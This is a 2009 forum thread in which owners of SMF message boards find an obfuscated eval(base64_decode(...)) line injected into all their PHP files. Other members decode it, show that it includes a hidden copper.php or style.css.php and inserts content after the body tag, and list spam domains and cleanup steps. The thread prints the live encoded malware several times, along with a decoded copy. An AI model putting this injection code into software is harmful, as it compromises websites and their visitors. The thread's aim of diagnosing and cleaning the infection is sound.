Advertisement:

Author Topic: Is this a hack?  (Read 14338 times)

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Is this a hack?
« on: February 07, 2009, 10:16:55 PM »
I have code at the top of some of my files im guessing is a hack?

Code: [Select]
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9hbnlwdXBjby9wdWJsaWNfaHRtbC9hLWNvcnNvdGFsay9iYi9UaGVtZXMvc2NyaWJibGVzMTEvaW1hZ2VzL2ltZy9pbWcvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2FueXB1cGNvL3B1YmxpY19odG1sL2EtY29yc290YWxrL2JiL1RoZW1lcy9zY3JpYmJsZXMxMS9pbWFnZXMvaW1nL2ltZy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #1 on: February 07, 2009, 10:37:59 PM »
nevermind sorry i figured it out that it was.

Offline MrMike

  • Full Member
  • ***
  • Posts: 597
    • BotScout.com - Bust Those Bots!
Re: Is this a hack?
« Reply #2 on: February 07, 2009, 10:39:46 PM »
Yep, it decodes to this...and it contains more obfuscated strings. It's a hack.

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B& 8) {$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #3 on: February 07, 2009, 10:42:43 PM »
any idea how to figure out how this is happening?

Offline MrMike

  • Full Member
  • ***
  • Posts: 597
    • BotScout.com - Bust Those Bots!
Re: Is this a hack?
« Reply #4 on: February 07, 2009, 11:41:51 PM »
It looks like they put the file "copper.php" on the site and are calling it through an include:

home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php

There's a lot off GZ-encoded stuff to further hide the programming statements. It could be almost anything, a malware dropper, an extra ad displayer, a backdoor, a botnot includer file, etc etc.

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #5 on: February 08, 2009, 12:18:12 AM »
ugh thanks...

lets hope it stops. considering i do not even have that file in my themes directory anymore...

Offline MrMike

  • Full Member
  • ***
  • Posts: 597
    • BotScout.com - Bust Those Bots!
Re: Is this a hack?
« Reply #6 on: February 08, 2009, 12:47:47 AM »
ugh thanks...

lets hope it stops. considering i do not even have that file in my themes directory anymore...
More importantly, you want to find out how your site was compromised initially or it'll probably be exploited again. They may also have installed additional code on your site that you'll want to find.

If you're running on a linux box, this command will list the newest files anywhere on the system:  ls -a -l -t -R | more

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #7 on: February 08, 2009, 12:50:42 AM »
im not sure exactly if i am or not or how to run that code...would you mind explaining? thanks so much.

Offline Fustrate

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,474
  • Gender: Male
  • Controller of the rum budget
    • @Fustrate on Twitter
    • Fustrate
Re: Is this a hack?
« Reply #8 on: February 08, 2009, 01:43:19 AM »
I got bored... doubt it'll be very helpful without the copper.php file, but here it is all cleaned up.

Code: [Select]
if(function_exists('ob_start') && !isset($GLOBALS['sh_no'])){
$GLOBALS['sh_no'] = 1;

if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){
include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');

if(function_exists('gml') && !function_exists('dgobh')){
if(!function_exists('gzdecode')){
function gzdecode($var1){
$var2 = ord(substr($var1, 3, 1));
$var3 = 10;
$var4 = 0;

if($var2&4){
$var4 = unpack('v',substr($var1, 10, 2));
$var4 = $var4[1];
$var3 += 2 + $var4;
}

if($var2&8)
$var3 = strpos($var1, chr(0), $var3) + 1;

if($var2&16)
$var3 = strpos($var1, chr(0), $var3) + 1;

if($var2&2)
$var3 += 2;

$var5 = gzinflate(substr($var1, $var3));

if($var5 === FALSE)
$var5 = $var1;

return $var5;
}
}

function dgobh($var6){
Header('Content-Encoding: none');
$var7 = gzdecode($var6);
if(preg_match('/<body/si', $var7))
return preg_replace('/(<body[^>]*>)/si', '$1' . gml(), $var7);
else
return gml() . $var7;
}

ob_start('dgobh');
}
}
}
Steven Hoffman
Former Team Member, 2009-2012

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #9 on: February 08, 2009, 01:50:55 AM »
forgive my ignorance but what exactly is this cleaned up?  O:)

Offline aldo

  • Sophist Member
  • *****
  • Posts: 1,356
  • Gender: Male
Re: Is this a hack?
« Reply #10 on: February 08, 2009, 01:53:14 AM »
We would need to see copper.php in order to know what it does.

Offline Fustrate

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,474
  • Gender: Male
  • Controller of the rum budget
    • @Fustrate on Twitter
    • Fustrate
Re: Is this a hack?
« Reply #11 on: February 08, 2009, 01:54:12 AM »
Well it's that big chunk of code from MrMike's post, with the really long variables replaced with $var1 - $var7, and put in a form that actually legible.

The only thing I can discern from it is that it adds whatever gml() does right after the <body> tag. Without copper.php, we don't know what gml() puts in there.
Steven Hoffman
Former Team Member, 2009-2012

Offline Totosfo

  • Newbie
  • *
  • Posts: 9
Re: Is this a hack?
« Reply #12 on: February 08, 2009, 05:01:53 PM »
Hi all,

I had the same issue - the code was added to ALL .php files on my server. If anyone is interested in the copper.php file, I can provide it, just let me know where to mail it.

Best,

Thomas

Offline Fustrate

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,474
  • Gender: Male
  • Controller of the rum budget
    • @Fustrate on Twitter
    • Fustrate
Re: Is this a hack?
« Reply #13 on: February 08, 2009, 05:22:47 PM »
can you email it here? whatsthebigdill@fustrate.com
Steven Hoffman
Former Team Member, 2009-2012

Offline cafecommk

  • Semi-Newbie
  • *
  • Posts: 31
Re: Is this a hack?
« Reply #14 on: February 14, 2009, 05:16:34 AM »
Can someone tell me how did you resolve this issue. i do not have a copper.php file but I have this :
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS92aXN0aW5hYy9wdWJsaWNfaHRtbC9jYWZlL2ZvcnVtL21hbWJvdHMvZWRpdG9ycy90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3BsdWdpbnMvbWVkaWEvaW1hZ2VzL3Bhc3RlL2pzY3JpcHRzL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));
and it is in all my php files. even in settings_bak

I appologize for  writing in two posts http://www.simplemachines.org/community/index.php?topic=291664.msg1931245#msg1931245

thank you

Offline Fustrate

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,474
  • Gender: Male
  • Controller of the rum budget
    • @Fustrate on Twitter
    • Fustrate
Re: Is this a hack?
« Reply #15 on: February 14, 2009, 12:29:39 PM »
you'd probably have to remove it manually from every file, or use a large upgrade like [n3rve] said in the other thread.

And there was no file at /home/vistinac/public_html/cafe/forum/mambots/editors/tinymce/jscripts/tiny_mce/plugins/media/images/paste/jscripts/copper.php? I still haven't been able to find a copy of it to see what this does, but since you said it's not there, we still don't quite know what this does.
« Last Edit: February 14, 2009, 12:32:16 PM by Fustrate »
Steven Hoffman
Former Team Member, 2009-2012

Offline cafecommk

  • Semi-Newbie
  • *
  • Posts: 31
Re: Is this a hack?
« Reply #16 on: February 15, 2009, 07:07:08 AM »
sorry i did not find a copper.php . I removed all the files not needed and [n3rve] helped on the large upgrade and ....
I just hope it does not make me anymore trouble.

Offline ccondrup

  • Semi-Newbie
  • *
  • Posts: 47
  • Gender: Male
Re: Is this a hack?
« Reply #17 on: May 07, 2009, 09:38:23 PM »
I have recently had my Smf 1.1.8 board hacked. I have recently seen an increase in automatically registered accounts, and a couple of automated spam posts, so I have been monitoring a little closer lately. When suddenly lots of avatars went missing, I knew something was up.

All .php files under /www/ had this line injected at the top of the file:
Code: [Select]
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS8zL2IvYm14L3d3dy9wbWEvcG1kL3N0eWxlcy9kZWZhdWx0L2ltYWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvMy9iL2JteC93d3cvcG1hL3BtZC9zdHlsZXMvZGVmYXVsdC9pbWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>No files with other file extensions were touched, and .php files outside of /www/ were also unharmed.

The above base64 hash decodes to what is in the attached decoded_injection.php
It in turn calls the main hack file, in my case called style.css.php - in my case this was placed in a subdirectory of an outdated phpmyadmin-install, quite possibly their point of entry for the exploit. I guess this file can be named copper.php or whatever in other circumstances.

This style.css.php file was a 170kb file with a huge base64 hash. It decoded to approx 20 new base64 encoded evals. I decoded everything I found and ran it through a code prettyfier, and ended up with a 100kb php file of approx 2000 lines of code. I did a search+replace for some of the function names, but quickly tired and stopped halfway through - the file is just so massive..

Also, if your site is infected, take note of which folder that last mentioned file is in, because in the same folder is where it stores the generated spam files this hack creates. They are files without extensions, names ranging from just "t", "50", to longer names such as "f2219f70f695539a82941423841dc26c". I have attached 3 examples of those final spam files this hack aims to generate.

You can search the style.css.php file for "http:" to quickly find the involved spam domains, which include:
   nomsat23.net nssat3.com wplsat23.net pearch.net gawab.com
After googling gawab.com and the other mentioned callback-urls, I found several domains common forum admins have had trouble with, so I am creating an sql file to add all these domains to my smf bantriggers. Its also attached as spamdomains.sql - remember to replace 15 with the id of the bangroup you want to add these to.

Hope this helps someone. If anyone cares to dig deeper into the code, please update the thread with whatever you find.
« Last Edit: May 07, 2009, 09:50:11 PM by ccondrup »

Offline busterone

  • SMF Hero
  • ******
  • Posts: 2,106
  • Gender: Male
  • Devil Dog
    • The Demon's Den
Re: Is this a hack?
« Reply #18 on: May 07, 2009, 10:20:13 PM »
That looks really familiar.  Did you, or do you have a member named Krisbarteo?

If so, you may want to look at this thread-
http://www.simplemachines.org/community/index.php?topic=307717.msg2047539#msg2047539

Offline ccondrup

  • Semi-Newbie
  • *
  • Posts: 47
  • Gender: Male
Re: Is this a hack?
« Reply #19 on: May 07, 2009, 10:38:51 PM »
Wouldn't you know it, I came directly to this thread via a search for the base64 hash in all the files. After I had posted, I looked at the other threads in the forum, so I found out how common this issue was ;)

I have already read the one you linked, and now all my bantriggers are removed and this mod has been installed. Yes, Krisbarteo was present, and a few other suspicious members from same host/ip. So far it has found ~10 registered members that are confirmed spammers. Already love the mod ;)